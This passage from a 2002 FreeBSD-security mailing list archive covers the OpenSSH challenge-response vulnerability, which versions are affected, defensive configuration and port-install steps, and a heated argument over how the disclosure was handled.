tell you more about that but not I. Current thinking is that if there's any trend in hackerdom then it is away from publishing exploits. Why ? Well, it defeats their own ability to break into stuff, doesn't it ? I also have some reason to believe that the likes of ISS would have more of an inclination than you about "what's out there". This isn't to insult you but rather they have dedicated resources who's paid job it is to find this stuff out (xforce). Choose what you wish to believe, but be careful about interpreting what others say, without asking them first, if it is not clear. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 2:10:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from gamma.star.spb.ru (gamma.star.spb.ru [217.195.79.1]) by hub.freebsd.org (Postfix) with ESMTP id 920F637B400 for ; Thu, 27 Jun 2002 02:10:24 -0700 (PDT) Received: from green.star.spb.ru (green.star.spb.ru [217.195.79.10]) by gamma.star.spb.ru (8.9.3/8.9.3) with ESMTP id NAA54269; Thu, 27 Jun 2002 13:10:01 +0400 (MSD) Received: from 217.195.79.7 ([217.195.79.7]) by green.star.spb.ru with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id NRJVGR6J; Thu, 27 Jun 2002 13:09:50 +0400 Date: Thu, 27 Jun 2002 13:09:48 +0400 From: "Nickolay A. Kritsky" X-Mailer: The Bat! (v1.49) Personal Reply-To: "Nickolay A. Kritsky" X-Priority: 3 (Normal) Message-ID: <88624007.20020627130948@internethelp.ru> To: D J Hawkey Jr Cc: Steve Ames , Dag-Erling Smorgrav , freebsd-security@FreeBSD.ORG Subject: Re[2]: CERT (Was: Re: NUTS! "Much ado about nothing" -- I need a clearer up or down) In-reply-To: <20020626214957.A2165@sheol.localdomain> References: <200206261711.g5QHB9t00396@sheol.localdomain> <20020626210055.A2065@sheol.localdomain> <20020627022949.GA55324@energistic.com> <20020626214957.A2165@sheol.localdomain> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello D, Thursday, June 27, 2002, 6:49:57 AM, you wrote: DJHJ> On Jun 26, at 09:29 PM, Steve Ames wrote: >> >> On Wed, Jun 26, 2002 at 09:00:55PM -0500, D J Hawkey Jr wrote: >> > On Jun 27, at 03:49 AM, Dag-Erling Smorgrav wrote: >> > > >> > > hawkeyd@visi.com (D J Hawkey Jr) writes: >> > > > Sorry to be so thick-headed, but between Mike and Jacques, the answer >> > > > to "Is 'OpenSSH_2.9 FreeBSD localisations 20020307' even vulnerable?" >> > > > is "That does appear to be the case.". >> > > >> > > 2.9 is not vulnerable to this particular attack. >> > >> > That's as simple as it gets. Thanks. >> >> That "particular attack"... yep. The CERT advisory seemed to indicate >> that earlier versions also have vulnerabilities? From 2.3.1p1 to 3.3... DJHJ> See below for some observations. For brevity's sake, I've snipped irrelevant DJHJ> text. for brevity's sake I've snipped even more >> Disable PAM authentication via interactive keyboard >> >> For OpenSSH versions greater than 2.9, system administrators can >> disable the vulnerable portion of the code affecting the PAM >> authentication issue by setting the "PAMAuthenticationViaKbdInt" >> configuration option to "no" in their sshd configuration file. >> Typically, this is accomplished by adding the following line to >> /etc/ssh/sshd_config: >> >> PAMAuthenticationViaKbdInt no DJHJ> No such animal with the OpenSSH version in RELENG_4_5. I don't know which version of OpenSSH is used in RELENG_4_5, but for those of you, who run OpenSSH_2.9.9p2, this is what you should know: such option exists, and according to man page is turned off by default. from `man sshd': PAMAuthenticationViaKbdInt Specifies whether PAM challenge response authentication is al- lowed. This allows the use of most PAM challenge response authen- tication modules, but it will allow password authentication re- gardless of whether PasswordAuthentication is disabled. The de- fault is ``no''. ;------------------------------------------- ; NKritsky ; mailto:nkritsky@internethelp.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 2:15:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from noe.warszawa.mtl.pl (noe.warszawa.multinet.pl [213.241.3.26]) by hub.freebsd.org (Postfix) with ESMTP id 5267E37B406 for ; Thu, 27 Jun 2002 02:15:28 -0700 (PDT) Received: by noe.warszawa.mtl.pl (Postfix, from userid 1007) id 153327DF64; Thu, 27 Jun 2002 11:15:37 +0200 (CEST) Received: from cerint.pl (white.cerint.pl [62.244.134.171]) by arka.warszawa.mtl.pl (Postfix) with ESMTP id ABB3EEA77A for ; Thu, 27 Jun 2002 11:15:34 +0200 (CEST) Message-ID: <3D1AD7C4.9020909@cerint.pl> Date: Thu, 27 Jun 2002 11:15:48 +0200 From: Marcin Gryszkalis Organization: Cerint Technology Group User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.1a+) Gecko/20020626 X-Accept-Language: en-us, en, pl MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: openssh OR openssh-portable Content-Type: text/plain; charset=ISO-8859-2; format=flowed Content-Transfer-Encoding: 7bit X-AntiVirus: Poczta jest monitorowana oprogramowaniem antywirusowym. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org hi Which port should I use (I'm migrating from -stable basesystem ssh) security/openssh or security/openssh-portable ? -- Marcin Gryszkalis or To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 2:21:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from relay.ie-online.it (dns.ie-online.it [212.110.22.137]) by hub.freebsd.org (Postfix) with ESMTP id C6F8937B408 for ; Thu, 27 Jun 2002 02:21:06 -0700 (PDT) Received: from 127.0.0.1 (localhost.ie-online.it [127.0.0.1]) by dummy.domain.name (Postfix) with SMTP id D38D947B8E; Thu, 27 Jun 2002 11:21:04 +0200 (CEST) Message-Id: <3.0.5.32.20020627112059.00a3f100@civetta.gufi.org> X-Sender: riva@civetta.gufi.org X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Thu, 27 Jun 2002 11:20:59 +0200 To: Mark.Andrews@isc.org, Brett Glass From: Stefano Riva Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Cc: security@FreeBSD.ORG In-Reply-To: <200206270118.g5R1Iom0030235@drugs.dv.isc.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 11.18 27/06/02 +1000, Mark.Andrews@isc.org wrote: >> > Provided you are behind a nameserver you trust that reconstructs >> > the answer you should be fine. >> > BIND 9 reconstucts all answers (excluding forwarded UPDATES). >> > BIND 8 forwards some and reconstructs others. >> Could an exploit be set up as a forwarded UPDATE? > No. >> (Forgive me if >> this is a naive question; I know that I need to become more familiar >> with DDNS.) If not, then installing BIND 9 and/or forcing clients >> to consult a BIND 9 server may be an acceptable workaround. OK, the Right Thing (TM) is to update the world + any extra binary statically linked with libc which uses the resolver... but I for one manage about 30 FreeBSD servers with lots of potentially "vulnerable" applications and reading that such a simple workaround exists is... oxygen for my lungs! So many firewalled networks have at least one caching DNS already used by all clients. This workaround had not been mentioned by the announcement; maybe an updated security advisory should be released. Just my opinion, of course. I'll do the Right Thing ASAP; meanwhile thanks for the info, guys. --- Stefano Riva sriva@gufi.org Gruppo Utenti FreeBSD Italia http://www.gufi.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 2:27:52 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.web.de (smtp02.web.de [217.72.192.151]) by hub.freebsd.org (Postfix) with ESMTP id 7B2B537B407 for ; Thu, 27 Jun 2002 02:27:46 -0700 (PDT) Received: from [217.225.204.77] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.70 #5) id 17NVZ2-0006Ot-00 for freebsd-security@FreeBSD.ORG; Thu, 27 Jun 2002 11:27:45 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id C41452A0 for ; Thu, 27 Jun 2002 11:27:43 +0200 (CEST) Received: from jan-linux.lan (jan-linux.lan [192.168.0.20]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 2A4A3174 for ; Thu, 27 Jun 2002 11:27:40 +0200 (CEST) Subject: Re: Wow (or, How Theo should have handled it) From: Jan Lentfer Cc: FreeBSD Security Mailling List In-Reply-To: <200206270743.g5R7hswj029148@cvs.openbsd.org> References: <200206270743.g5R7hswj029148@cvs.openbsd.org> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7-1mdk Date: 27 Jun 2002 11:27:38 +0200 Message-Id: <1025170058.2815.37.camel@jan-linux.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Am Don, 2002-06-27 um 09.43 schrieb Theo de Raadt: [...] > Fact is, you ranting assholes are complete idiots. [...] I thought you did get some sleep by now and would have calmed down a little (as I wished the rest of the list did, too). Can't you get your point through without insulting people? Don't get me wrong, I read what you wrote and I get your point and I have no problem with how things were handeld (since I only maintain a few boxes of arguable value at my university) - but I also would have understood you if you left away the insults and rants. I am on this list for a few weeks now - if it is going on like that I will pretty soon leave and try to get my information elsewhere. For me this topic is through, every thing said now won't change what happend. The way this was handled seems to be at least arguable - maybe a lesson learned - maybe not, we will see. But all this ranting is not getting us any further and it makes it really hard to filter SECURITY-related information from the list. This is just my opinion, if you don't like it - no problem, but I don't care, so don't tell me. Thanks. Jan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 2:33:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.kyx.net (s216-232-31-82.bc.hsia.telus.net [216.232.31.82]) by hub.freebsd.org (Postfix) with ESMTP id 2E4AC37B407 for ; Thu, 27 Jun 2002 02:33:06 -0700 (PDT) Received: from smp.kyx.net (unknown [216.232.31.79]) by mail.kyx.net (Postfix) with SMTP id 365651DC03 for ; Thu, 27 Jun 2002 02:51:23 -0700 (PDT) From: Dragos Ruiu Organization: kyx.net To: freebsd-security@freebsd.org Subject: re: Meta Wow SSHD has a hole and CERT put out a lot of good info in a very timely fashion. Date: Thu, 27 Jun 2002 01:37:24 -0700 X-Mailer: KYX-CP/M [version core00-mail-92] Content-Type: text/plain MIME-Version: 1.0 Message-Id: <0206270232160C.09037@smp.kyx.net> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Ok baiting Theo into being defensive doesn't seem like a good use of this list. In reality, given the past history you can't really fault him if he says nothing at all to this list. Admittedly he gets somewhat heated and pointed in his remarks when he seems to be getting attacked and yelled at from all corners for trying TO HELP YOU! It's preatty easy to shut up and say nothing and let you discover the bug the hard way on your own :-) He worked with CERT and many individuals (including myself) to distribute information about this vulnerability. I found him very helpful even when it was obvious that he had been working a long time without rest to assist all of our sorry asses to secure our machines. With assitance from the unpaid OpenSSH team CERT rapidly put out a throroughly comprehensive advisory to correct a some omissions in other posts on lists such as Bugtraq and some incorrect info from various Linux vendors as well as rampant gossip mills spinning up on Slashdot and elsewhere. CERT covered the issue, beat it soundly to death and put a few bullets into it to make sure it was dead, so there is a lot of info there for the people who are looking for it. Look at the CERT advisory - they collated excellent information. Bottom line for me is that the Chalenge/Response malloc issue (which is not the only issue fixed in 3.4) was introduced in 2.31 and may or may not be exploitable on various code builds and options, and is definitely mitigated by Niels' very cool Privilege Separation mod - and I don't really care which vendors may or may not claim any moral high ground by not being vulnerable. You should upgrade to the latest and best codebase if at all possible. Anything else seems like mitgatable risk. Nitpicking the disclosure timing or process seems to be missing the point which is just upgrade you code base already... Any Linux vendors or other high profile individuals who claim not to trust OpenSSH/Niels/Markus/Theo/whomever obviously hasn't seen the intense passion and energy these individuals devote (without reward!) in principle to galantly develop more secure solutions for them. Stop bitching at them and thank them, for they owe YOU nothing... you are in their debt. (Or else the you are just proving the stance of a certain large organization which claim that Linux/opensource are just giant trojans in themselves :-). I for one have nothing but the highest respect for the coders on OpenSSH and think they are some of the finest programming minds around (they sure kick my ass in coding) as well as immensely trustworthy persons and feel glad that there are such smart, dedicated, individuals with a high enough moral fiber and dedication to look out for all of us. Honestly, these folks are doing their best to do the right thing, and I have not seen anything in this incident that rates any of this alarm or any form of allegation of wrong doing or improper procedure. If there are any charges to be leveled of crying wolf they should be leveled at the ISS management, who claimed the exploit was in circulation, though one of their engineers wrote it... go figure. They jumped the gun on the slated Monday release for whatever reason and caught a lot of people off guard, (and I'm sure some NIPC folks who had planned to have leave this week before a long weekend are cursing now :-). IMHO the usual IRC/gossip/whatever that I monitor as a course of daily security work had no prewarning about this. The usual candidates like w00w00 etc... were not rampantly distributing exploits before the surprise disclosure this morning. 7350 seems to have known about the exploit but was properly sitting on it so I have some doubts about the "circulation". The claimed GOBBLES Linux exploit which I haven't seen yet was coded after disclosure afaik, but I'm sure GOBBLES will let us know in their imitable style. (I dunno I find that stuff funny and look forward to the latest GOBBLES jokes and slags :-). If you can't laugh.... So folks please let's stop with the finger pointing and lets focus that energy on getting all those machines upgraded to 3.4 and turn on priviledge separation because it's a major security improvement (thanks again Niels). It will be difficult enough to get all those "marginally administered" machines upgraded so they won't be nice launch points for the next DDoS attack when somer kiddie needs his nick back or wants to take over some channel with their bots - without all this needless complaining. Oh and thank you to OpenSSH for providing and strongly maintaining an excellent and innovative code base that I can use to affordably make sure I don't have to use telnet. Additionally a big thank you to all the other derivative code maintainers who watch their work and update their respective platforms. At the end of the day none of these people are getting money to do this work for us or notify _anyone_ so we should all stop criticizing and try to see how we can help them... Now we should all cut them some slack because all the critical posts are in the wrong, and I'm appalled at the level of criticism being leveled at laudable volunteers, I daresay even computer/network security heroes... Cheers, --dr -- --dr http://dragos.com/dr-dursec.asc 0 = 1; for small values of one and large values of zero To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 2:45:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from gamma.star.spb.ru (gamma.star.spb.ru [217.195.79.1]) by hub.freebsd.org (Postfix) with ESMTP id 6F46937B405 for ; Thu, 27 Jun 2002 02:45:23 -0700 (PDT) Received: from green.star.spb.ru (green.star.spb.ru [217.195.79.10]) by gamma.star.spb.ru (8.9.3/8.9.3) with ESMTP id NAA80656; Thu, 27 Jun 2002 13:45:00 +0400 (MSD) Received: from 217.195.79.7 ([217.195.79.7]) by green.star.spb.ru with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id NRJVGR7H; Thu, 27 Jun 2002 13:44:50 +0400 Date: Thu, 27 Jun 2002 13:44:54 +0400 From: "Nickolay A. Kritsky" X-Mailer: The Bat! (v1.49) Personal Reply-To: "Nickolay A. Kritsky" X-Priority: 3 (Normal) Message-ID: <1392729554.20020627134454@internethelp.ru> To: Theo de Raadt Cc: Wincent Colaiuta , freebsd-security@FreeBSD.ORG Subject: (OT) Re[2]: Wow (or, How Theo should have handled it) In-reply-To: <200206270743.g5R7hswj029148@cvs.openbsd.org> References: <200206270743.g5R7hswj029148@cvs.openbsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello Theo, Thursday, June 27, 2002, 11:43:54 AM, you wrote: >> Seriously, Theo, the best thing you could've done would have been to >> fully disclose the original bug in the challenge/response code and the >> one-line fix (turn off challenge/response auth), and told people two >> things: firstly, that patches were being worked on; and secondly, that >> 3.4 was on the way soon and that it would be desirable to upgrade to >> that and activate priv separation so as to better cope with future >> potential holes. TdR> The first half of what you say is completely insane; The second half is TdR> exactly what we did. TdR> Fact is, you ranting assholes are complete idiots. Let me explain. I do not think that all people subscribed to freebsd-security need the explanation why you think your opponents are idiots. I am not interested. I do not care if they are idiots. I do not care if you are one. Sorry if you do not like it. I had an assumption that this list is about ( freebsd AND security ), not about ( freebsd OR security ). Was I wrong? It is not a rethorical question, I really need the answer. I have subscribe freebsd-security about 1,5 years ago (this is my whole UNIX and freeBSD experience), and it was just the right place for asking for help or discussing some new features. But some time ago the list has changed. After that monstrous flame about OpenSSH vuln. I even started to think about some procmail filters for this list. The only reason I still did not start hard-filtering this part of my mail is that I still hope to find some useful information between piles of garbage like `You are idiots and freedom's enemies', `Let's protect full disclosure', `Oh my goodness, I have nnn production servers to upgrade, and it is your fault that I have worked more than 8 hours yesterday' or `Brett Sucks'. Please, stop it! CC: all this junk to freebsd-chat. PS: If anyone wants to reply me, please do this in private, or CC: to freebsd-chat, because my post is off-topic for this list. PPS: Oh, God. They managed to piss off likely the most tolerable man in the world. PPPS: Sorry for my english, I am still learning.By the way, what does `hogwash' mean in the thread above? Both hog and wash are known words. ;------------------------------------------- ; NKritsky ; mailto:nkritsky@internethelp.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 3:31:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id 0CEBF37B401 for ; Thu, 27 Jun 2002 03:31:11 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com; Thu, 27 Jun 2002 03:31:10 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: security@FreeBSD.ORG Date: Thu, 27 Jun 2002 03:31:10 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Installing openssh-portable 3.4 Reply-To: pjklist@ekahuna.com Cc: Robin Smith In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020627103110488.AAA796@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Date: Wed, 26 Jun 2002 08:26:37 -0500 > From: Robin Smith > Subject: OpenSSH hole > > Having installed the openssh-portable port on a couple of FreeBSD boxes, I > have a note and a question. > > Note: > > The port does just about the whole job (creates user/group sshd, dir /var/empty) > and (with the option -D OPENSSH_OVERWRITE_BASE) puts all the stuff in the right > places, except for the sample rc script, which it tries to drop into /usr/etc/rc.d. > Since that's not part of the standard FreeBSD layout, the make then dies (so symlink > /usr/etc->/usr/local/etc). Otherwise, all I had to do was edit and install the config > files. Re: this -D option, I've rarely if ever had to use options when building ports - where do I use that argument: on the "make" or the "make install" command line or both? IE should it be: #cd /usr/ports/security/openssh-portable #make -DOPENSSH_OVERWRITE_BASE #make install Should I pkg_delete the openssh-overwrite-base-3.3p_1 first, or just fix things in pkgdb afterwards? ?? Thanks, Phil PS: I wish people would settle on just ONE or TWO (informatively named) SSH threads... with all these threads I spent over an hour wading through stuff trying to find pertinent information. -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 3:39:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from spork.pantherdragon.org (spork.pantherdragon.org [206.29.168.146]) by hub.freebsd.org (Postfix) with ESMTP id B42E537B400 for ; Thu, 27 Jun 2002 03:39:35 -0700 (PDT) Received: from spark.techno.pagans (spark.techno.pagans [4.61.202.145]) by spork.pantherdragon.org (Postfix) with ESMTP id E75DE471DA; Thu, 27 Jun 2002 03:39:34 -0700 (PDT) Received: from pantherdragon.org (speck.techno.pagans [172.21.42.2]) by spark.techno.pagans (Postfix) with ESMTP id CFE7EFEBE; Thu, 27 Jun 2002 03:39:33 -0700 (PDT) Message-ID: <3D1AEB65.D29CF5BD@pantherdragon.org> Date: Thu, 27 Jun 2002 03:39:33 -0700 From: Darren Pilgrim X-Mailer: Mozilla 4.76 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: pjklist@ekahuna.com Cc: security@FreeBSD.ORG, Robin Smith Subject: Re: Installing openssh-portable 3.4 References: <20020627103110488.AAA796@empty1.ekahuna.com@pc02.ekahuna.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Philip J. Koenig" wrote: > > From: Robin Smith > > The port does just about the whole job (creates user/group sshd, dir /var/empty) > > and (with the option -D OPENSSH_OVERWRITE_BASE) puts all the stuff in the right > > places, except for the sample rc script, which it tries to drop into /usr/etc/rc.d. > > Since that's not part of the standard FreeBSD layout, the make then dies (so symlink > > /usr/etc->/usr/local/etc). Otherwise, all I had to do was edit and install the config > > files. > > Re: this -D option, I've rarely if ever had to use options when > building ports - where do I use that argument: on the "make" or the > "make install" command line or both? IE should it be: > > #cd /usr/ports/security/openssh-portable > #make -DOPENSSH_OVERWRITE_BASE > #make install Issue it as one line: #make -DOPENSSH_OVERWRITE_BASE all install clean > Should I pkg_delete the openssh-overwrite-base-3.3p_1 first, or just > fix things in pkgdb afterwards? Use the -DFORCE_PKG_REGISTER option: #make -DOPENSSH_OVERWRITE_BASE -DFORCE_PKG_REGISTER all install clean Someone please double-check me on this! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 4:54:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from bran.mc.mpls.visi.com (bran.mc.mpls.visi.com [208.42.156.103]) by hub.freebsd.org (Postfix) with ESMTP id A9DBA37B400 for ; Thu, 27 Jun 2002 04:54:42 -0700 (PDT) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bran.mc.mpls.visi.com (Postfix) with ESMTP id 85DC54D08; Thu, 27 Jun 2002 06:54:41 -0500 (CDT) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id g5RBsZZ03808; Thu, 27 Jun 2002 06:54:35 -0500 (CDT) (envelope-from hawkeyd) Date: Thu, 27 Jun 2002 06:54:35 -0500 From: D J Hawkey Jr To: "Nickolay A. Kritsky" Cc: Steve Ames , Dag-Erling Smorgrav , freebsd-security@FreeBSD.ORG Subject: Re: CERT (Was: Re: NUTS! "Much ado about nothing" -- I need a clearer up or down) Message-ID: <20020627065435.A3772@sheol.localdomain> Reply-To: hawkeyd@visi.com References: <200206261711.g5QHB9t00396@sheol.localdomain> <20020626210055.A2065@sheol.localdomain> <20020627022949.GA55324@energistic.com> <20020626214957.A2165@sheol.localdomain> <88624007.20020627130948@internethelp.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <88624007.20020627130948@internethelp.ru>; from nkritsky@internethelp.ru on Thu, Jun 27, 2002 at 01:09:48PM +0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Jun 27, at 01:09 PM, Nickolay A. Kritsky wrote: > > DJHJ> See below for some observations. For brevity's sake, I've snipped irrelevant > DJHJ> text. > > for brevity's sake I've snipped even more > > > > >> Disable PAM authentication via interactive keyboard > >> > >> [SNIP] > >> > >> PAMAuthenticationViaKbdInt no > > DJHJ> No such animal with the OpenSSH version in RELENG_4_5. > > I don't know which version of OpenSSH is used in RELENG_4_5, but for > those of you, who run OpenSSH_2.9.9p2, this is what you should know: > such option exists, and according to man page is turned off by > default. OpenSSH in RELENG_4_5 (FreeBSD 4.5-RELEASE[-pN]) is OpenSSH_2.9. To reiterate, all that has to be done for this version is turn off "ChallengeResponseAuthentication". > ; NKritsky Dave -- ______________________ ______________________ \__________________ \ D. J. HAWKEY JR. / __________________/ \________________/\ hawkeyd@visi.com /\________________/ http://www.visi.com/~hawkeyd/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 5: 5:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from johansson.homeip.net (hd5e2603d.gavlegardarna.gavle.to [213.226.96.61]) by hub.freebsd.org (Postfix) with ESMTP id B87B337B400 for ; Thu, 27 Jun 2002 05:05:27 -0700 (PDT) Received: from localhost (jj@localhost) by johansson.homeip.net (8.11.3/8.11.3) with ESMTP id g5RC15932694 for ; Thu, 27 Jun 2002 14:01:05 +0200 (CEST) (envelope-from jj@johansson.homeip.net) Date: Thu, 27 Jun 2002 14:01:05 +0200 (CEST) From: Johan Johansson To: freebsd-security@FreeBSD.ORG Subject: unsubscribe Message-ID: <20020627140044.R32692-100000@johansson.homeip.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 5: 9:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from norton.palomine.net (dsl254-102-179.nyc1.dsl.speakeasy.net [216.254.102.179]) by hub.freebsd.org (Postfix) with SMTP id F364F37B40A for ; Thu, 27 Jun 2002 05:09:30 -0700 (PDT) Received: (qmail 33568 invoked by uid 1000); 27 Jun 2002 12:09:29 -0000 Date: Thu, 27 Jun 2002 08:09:29 -0400 From: Chris Johnson To: D J Hawkey Jr Cc: freebsd-security@FreeBSD.ORG Subject: Re: CERT (Was: Re: NUTS! "Much ado about nothing" -- I need a clearer up or down) Message-ID: <20020627120929.GA33498@palomine.net> References: <200206261711.g5QHB9t00396@sheol.localdomain> <20020626210055.A2065@sheol.localdomain> <20020627022949.GA55324@energistic.com> <20020626214957.A2165@sheol.localdomain> <88624007.20020627130948@internethelp.ru> <20020627065435.A3772@sheol.localdomain> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020627065435.A3772@sheol.localdomain> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 27, 2002 at 06:54:35AM -0500, D J Hawkey Jr wrote: > OpenSSH in RELENG_4_5 (FreeBSD 4.5-RELEASE[-pN]) is OpenSSH_2.9. > To reiterate, all that has to be done for this version is turn off > "ChallengeResponseAuthentication". The version in RELENG_4_5 does not have this bug, so you don't even have to turn off ChallengeResponseAuthentication to be safe from this particular vulnerability. You're safe either way. That's not to say that it might not be vulnerable in some other way. Chris Johnson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 5:19:11 2002 Delivered-To: freebsd-security@freebsd.org Received: from sirius.pbegames.com (sirius.pbegames.com [64.124.9.107]) by hub.freebsd.org (Postfix) with ESMTP id 5D7FF37B407 for ; Thu, 27 Jun 2002 05:19:06 -0700 (PDT) Received: from leviathan.pbegames.com (medusa.pbegames.com [141.156.220.22]) by sirius.pbegames.com (8.11.5/8.11.5) with ESMTP id g5RCJ5R20113 for ; Thu, 27 Jun 2002 08:19:05 -0400 (EDT) (envelope-from thomas@pbegames.com) Message-Id: <5.1.0.14.2.20020627081749.01e19620@pbegames.com> X-Sender: thomas@pbegames.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Thu, 27 Jun 2002 08:20:40 -0400 To: freebsd-security@FreeBSD.ORG From: Mark Thomas Subject: Re: CERT (Was: Re: NUTS! "Much ado about nothing" -- I need a clearer up or down) In-Reply-To: <20020627120929.GA33498@palomine.net> References: <20020627065435.A3772@sheol.localdomain> <200206261711.g5QHB9t00396@sheol.localdomain> <20020626210055.A2065@sheol.localdomain> <20020627022949.GA55324@energistic.com> <20020626214957.A2165@sheol.localdomain> <88624007.20020627130948@internethelp.ru> <20020627065435.A3772@sheol.localdomain> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 08:09 AM 6/27/02 -0400, Chris Johnson wrote: >On Thu, Jun 27, 2002 at 06:54:35AM -0500, D J Hawkey Jr wrote: > > OpenSSH in RELENG_4_5 (FreeBSD 4.5-RELEASE[-pN]) is OpenSSH_2.9. > > To reiterate, all that has to be done for this version is turn off > > "ChallengeResponseAuthentication". > >The version in 